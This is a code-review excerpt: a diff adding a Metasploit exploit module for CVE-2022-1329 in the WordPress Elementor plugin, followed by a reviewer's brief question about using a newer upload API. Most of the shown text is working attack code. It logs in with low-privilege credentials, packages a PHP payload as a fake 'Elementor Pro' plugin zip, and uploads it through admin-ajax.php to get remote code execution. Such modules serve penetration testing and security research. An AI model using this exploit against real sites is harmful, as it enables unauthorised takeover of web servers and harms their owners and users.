modules/exploits/multi/http/wp_plugin_elementor_auth_upload_rce.rb

```diff
@@ -0,0 +1,134 @@
+          Tested against Elementor 3.6.1
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ramuel Gall', # Discovery
+          'AkuCyberSec', # Exploit-db
+          'h00die' # Metasploit module
+        ],
+        'References' => [
+          ['EDB', '50115'],
+          ['CVE', '2022-1329'],
+          ['URL', 'https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/'],
+          ['URL', 'https://www.youtube.com/watch?v=tIhN1svzAYk'] # great video about the exploit
+        ],
+        'Platform' => [ 'php' ],
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          [ 'Wordpress Elementor', {}]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2022-03-29',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username of a subscriber or higher account', '']),
+      OptString.new('PASSWORD', [true, 'Password of a subscriber or higher account', '']),
+      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])
+    ]
+  end
+
+  def check
+    unless wordpress_and_online?
+      return CheckCode::Safe('Server not online or not detected as Wordpress')
+    end
+
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    CheckCode::Safe('Invalid credentials given!') unless cookie
+
+    return check_plugin_version_from_readme('elementor', '3.6.3', '3.6.0')
+  end
+
+  def upload_file(nonce, cookie)
+    zip_file = Rex::Zip::Archive.new
+    payload_name = 'elementor-pro.php'
+    print_status("Payload file name: #{payload_name}")
+    # we end up in wp-admin, so we need to get to the right folder
+    register_dirs_for_cleanup('../wp-content/plugins/elementor-pro')
+    # payload must contain a Plugin Name header with the name of the plugin
+    pload = "<?php\n"
+    pload << "/**\n"
+    pload << "* Plugin Name: Elementor Pro\n"
+    pload << "*/\n"
+    pload << payload.encoded.gsub('/*<?php /**/ ', '')
+    pload << "\n?>"
+    zip_file.add_file("/elementor-pro/#{payload_name}", pload)
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('elementor_upload_and_install_pro', nil, nil, 'form-data; name="action"')
+    post_data.add_part(nonce, nil, nil, 'form-data; name="_nonce"')
+    post_data.add_part(zip_file.pack, 'application/x-zip-compressed', 'binary', 'form-data; name="fileToUpload"; filename="elementor-pro.zip"')
+
+    resp = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'cookie' => cookie
+    )
```

Comment:
Can we use the new file upload API here here? 🤞

Example uses: https://github.com/rapid7/metasploit-framework/pull/16442